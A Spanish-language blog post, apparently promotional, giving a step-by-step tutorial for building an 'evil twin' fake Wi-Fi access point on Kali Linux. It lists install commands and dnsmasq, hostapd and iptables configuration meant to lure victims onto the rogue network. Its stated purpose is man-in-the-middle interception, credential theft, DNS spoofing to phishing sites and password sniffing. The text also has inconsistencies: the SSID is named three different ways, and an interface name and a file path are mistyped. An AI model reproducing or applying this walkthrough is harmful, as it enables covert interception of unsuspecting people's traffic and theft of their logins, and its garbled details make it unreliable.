La idea es la creación
de tu propia red inalámbrica que se vea exactamente como la que usted está
atacando. Acuerdo con los profesionales de ethical hacking, las computadoras no
van a diferenciar entre los SSID´s que comparten el mismo nombre. En cambio, para
visualizar únicamente el que tiene la señal de conexión más fuerte. El objetivo
es que la víctima se conecte a su red falsificada y ejecute un
man-in-the-middle (MITM) y enviar sus datos a la Internet sin que él jamás
sospeche nada. Según curso de ciberseguridad, esto puede ser usado para robar
credenciales de alguien o DNS falsas por lo que la víctima visitara un sitio de
phishing, y ¡muchos más!
HARDWARE
/ SOFTWARE NECESARIOS:
Un adaptador inalámbrico
compatible TL-WN722N.
Kali Linux – Puedes ejecutar el comando a partir de
una USB o una VM.
Una forma alternativa de conectarse a Internet – La tarjeta que
está utilizando va a estar ocupado y por lo tanto no se puede conectar a
internet. Usted necesitará una forma de conectarse, de manera que se transmita
la información de la víctima sucesivamente. Según recomendación de experto de ethical
hacking, es
posible utilizar un adaptador inalámbrico por separado, conexión 3G / módem o
una conexión Ethernet a una red.
PASOS:
1.
Instalar el software que también establecerá nuestro servicio de
DHCP.
2.
Instalar algún software que falsifique la AP.
3.
Editar los archivos .conf para conseguir nuestra red pasando.
4.
Iniciar los servicios.
5.
Ejecutar los ataques.
–
CONFIGURACIÓN
DEL ADAPTADOR INALÁMBRICO
Esto va a suponer que usted está ejecutando Kali desde una
máquina virtual en Virtual Box.
Según el curso de ciberseguridad, en
primer lugar, conecte el adaptador inalámbrico en uno de los puertos USB.
En segundo lugar, si ya está ejecutando Kali, apáguelo. Abra
virtual Box y vaya a la configuración de la VM.
A continuación, haga clic en “Red” y seleccione la ficha
Adaptador 2.
Haga clic en “Habilitar adaptador de red ‘y luego seleccione’
Adaptador puenteado ‘
A continuación, haga clic en el nombre y seleccione el adaptador
inalámbrico.
Haga clic en Aceptar y
luego arrancar en su VM.
Escriba su nombre de usuario y contraseña e iniciar sesión. El
valor por defecto es root / Toor.
Según experto de ethical hacking Mike Dens, aquí viene la parte
difícil. Hemos establecido Kali para utilizar el adaptador inalámbrico como una
NIC, pero a la VM, el adaptador inalámbrico no se ha conectado todavía.
Ahora en la máquina virtual, vaya a la parte superior y haga
clic en “Dispositivos”, seleccione “Dispositivos USB”, y, finalmente, haga clic
en el adaptador inalámbrico.
A veces, cuando seleccionamos el dispositivo USB, no se carga
correctamente en la máquina virtual. Según el curso
de ciberseguridad que
si usted está teniendo problemas para conseguir Kali para reconocer el
adaptador inalámbrico, intente desactivar los puertos USB. Es posible que tenga
que probar varios antes de que funcione.
DNSMASQ
Abre una terminal.
Teclear el comando:
apt-get install -y
hostapd dnsmasq wireless-tools iw wvdial
Esto instalará todo el software necesario.
Ahora, vamos a configurar dnsmasq para servir a DHCP y DNS en su
interfaz inalámbrica e iniciar el servicio
Voy a pasar por este
paso a paso para que pueda ver qué es exactamente lo que está sucediendo:
cat <<EOF >
etc/dnsmasq.conf – Esto
le indica a la computadora para tomar todo lo que vamos a escribir e insertarlo
en el archivo /etc/dnsmaq.conf.
log-facility=var/log/dnsmasq.log – Esto le indica al ordenador dónde debe
poner todos los registros de que este programa podría generar.
#address=/#/10.0.0.1 – – es un comentario diciendo que vamos a
utilizar la red 10.0.0.0/24.
interface=wlan0 – le dice al ordenador cual NIC vamos a
utilizar para el DNS y el servicio DHCP.
dhcp-range=10.0.0.10,10.0.0.250,12h – Esto le indica a la computadora que rango
de direcciones IP nosotros deseamos asignar a las personas..
service dnsmasq start – inicia el servicio dnsmasq.
–
CONFIGURACIÓN
DEL PUNTO DE ACCESO INALÁMBRICO
Vamos a configurar una red con un SSID de ‘linksys’.
ifconfig wlan0 up – Esto confirma que nuestra interfaz wlan0
está trabajando explica experto
de ethical hacking.
ifconfig wlan0
10.0.0.1/24 –
Establece la interfaz wlan0 con la dirección IP 10.0.0.1 en el rango de
dirección privada de clase C.
iptables -t nat -A
POSTROUTING -o pp0 -j MASQUERADE – – Esto le indica a la computadora cómo
vamos a encaminar la información según curso de ciberseguridad.
iptables -A FORWARD -i
wlan0 -o ppp0 -j ACCEPT – Esto
le dice al equipo que vamos a encaminar los datos de wlan0 para ppp0.
echo ‘1’ >
/proc/sys/net/ipv4/ip_forward – Esto
se suma el número 1 al archivo ip_forward que le dice al equipo que queremos
que transmita la información.
cat <<EOF >
/etc/hostapd/hostapd.conf – Una
vez más, esto le dice al equipo que lo siguiente que escribimos queremos añadir
al archivo hostapd.conf.
interface=wlan0 – le dice al ordenador qué interfaz queremos
usar.
driver=nl80211 – le dice al ordenador que operador debe
utilizar para la interfaz.
ssid=Freewifi – Esto le indica a la computadora que
quieres el SSID sea, el nuestro es linksy.
service hostapd start – Arranca el servicio
En este punto, usted debe ser capaz de buscar, ya sea con su
teléfono u ordenador portátil, y encontrar el punto de acceso inalámbrico Rojo.
A partir de aquí, usted debería ser capaz de comenzar a realizar
todo tipo de trucos sucios, ataques MITM, la detección de paquetes, sacar
contraseñas, etc. Según expertos de experto de ethical hacking y
ciberseguridad, un buen programa de MITM es Ettercap. Pueden aprender más sobre
este ataque durante el curso de ciberseguridad.
0 comments:
Post a Comment